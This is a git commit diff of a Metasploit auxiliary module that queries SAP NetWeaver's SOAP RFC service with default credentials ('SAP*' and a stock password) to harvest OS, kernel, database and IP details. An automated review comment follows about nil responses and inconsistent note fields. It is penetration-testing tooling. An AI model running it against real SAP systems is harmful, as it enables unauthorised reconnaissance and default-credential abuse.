final cleanup

unstable
jvazquez-r7 2012-11-18 00:32:20 +01:00
parent e72946303e
commit a35c640acf
1 changed files with 234 additions and 73 deletions


@ -26,25 +26,32 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC_SYSTEM_INFO', 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering',
'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information. 'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information.
By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker
could obtain the operating system version, SAP version, and real IP address of the server.}, could obtain the operating system version, SAP version, and real IP address of the server.},
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'References' =>
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], [
'License' => BSD_LICENSE [ 'CVE', '2006-6010' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'Author' =>
[
'Agnivesh Sathasivam',
'nmonkee'
],
'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('USERNAME', [false, 'username ', 'SAP*']), Opt::RPORT(8000),
OptString.new('PASSWORD', [false, 'password ', '06071992']), OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('CLIENT', [false, 'client ', '001']), OptString.new('PASSWORD', [true, 'Password', '06071992']),
OptString.new('CLIENT', [true, 'Client ', '001']),
], self.class) ], self.class)
register_autofilter_ports([ 8000 ])
end end
def run_host(ip) def run_host(ip)
success = false
client = datastore['CLIENT'] client = datastore['CLIENT']
data = '<?xml version="1.0" encoding="utf-8" ?>' data = '<?xml version="1.0" encoding="utf-8" ?>'
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
@ -76,15 +83,12 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code != 500 and res.code != 200 if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc. # to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!") print_error("[SAP] #{ip}:#{rport} - something went wrong!")
return false return
else
success = true
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("[SAP] #{ip}:#{rport} - Unable to connect") print_error("[SAP] #{ip}:#{rport} - Unable to connect")
return false return
end end
if success
print_status("[SAP] #{ip}:#{rport} - got response") print_status("[SAP] #{ip}:#{rport} - got response")
saptbl = Msf::Ui::Console::Table.new( saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default, Msf::Ui::Console::Table::Style::Default,
@ -104,7 +108,6 @@ class Metasploit4 < Msf::Auxiliary
rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i
rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i
rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i
rfcdatabs = $1 if response =~ /<RFCDATABS>(.*)<\/RFCDATABS>/i
rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i
rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i
rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i
@ -114,8 +117,6 @@ class Metasploit4 < Msf::Auxiliary
rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i
rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i
rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i
rfchost2 = $1 if response =~ /<RFCHOST2>(.*)<\/RFCHOST2>/i
rfcsi_resv = $1 if response =~ /<RFCSI_RESV>(.*)<\/RFCSI_RESV>/i
rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i
saptbl << [ "Release Status of SAP System", rfcsaprl ] saptbl << [ "Release Status of SAP System", rfcsaprl ]
saptbl << [ "RFC Log Version", rfcproto ] saptbl << [ "RFC Log Version", rfcproto ]
@ -143,6 +144,166 @@ class Metasploit4 < Msf::Auxiliary
saptbl << [ "Daylight Saving Time", rfcdayst ] saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")] saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s) print(saptbl.to_s)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.release',
:data => "Release Status of SAP System: #{rfcsaprl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.rfc_log',
:data => "RFC Log Version: #{rfcproto}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.kernel',
:data => "Kernel Release: #{rfckernrl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'system.os',
:data => "Operating System: #{rfcopsys}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db.hostname',
:data => "Database Host: #{rfcdbhost}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db_system',
:data => "Central Database System: #{rfcdbsys}"
)
if rfcinttyp == 'LIT'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Little Endian"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Big Endian"
)
end end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.hostname',
:data => "Hostname: #{rfchost}"
)
if rfcflotyp == 'IE3'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IEEE"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IBM/370"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v4',
:data => "IPv4 Address: #{rfcipaddr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v6',
:data => "IPv6 Address: #{rfcipv6addr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.instance',
:data => "System ID: #{rfcsysid}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.rfc.destination',
:data => "RFC Destination: #{rfcdest}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.timezone',
:data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.charset',
:data => "Character Set: #{rfcchartyp}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.daylight_saving_time',
:data => "Daylight Saving Time: #{rfcdayst}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.machine_id',
:data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}"
)
end end
end end
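Review bot: The guard `if res and res.code != 500 and res.code != 200` lets a nil `res` fall through to the "got response" path, because `nil and …` is falsy; with the `success` flag removed in this commit, nothing visible in the hunk stops the response parsing from running on a nil reply, so add `return print_error("[SAP] #{ip}:#{rport} - no response") unless res` before the status check (the "to do" comment already acknowledges the missing error handling). In the report_note additions, the first four calls pass `:sname => 'sap'` while the remaining thirteen omit it; either every note for this service should carry it or none should, otherwise the notes split across two service groupings in the database. `rfctzone.gsub(/\s+/, "")` and `rfcmach.gsub(/\s+/, "")` in the note data raise NoMethodError when the corresponding tag is absent from the response, since those locals stay nil; `rfctzone.to_s.gsub(...)` would keep a partial result reportable — confirm whether the parsing code outside the hunk already defaults them. run_host begins and continues outside the hunks shown.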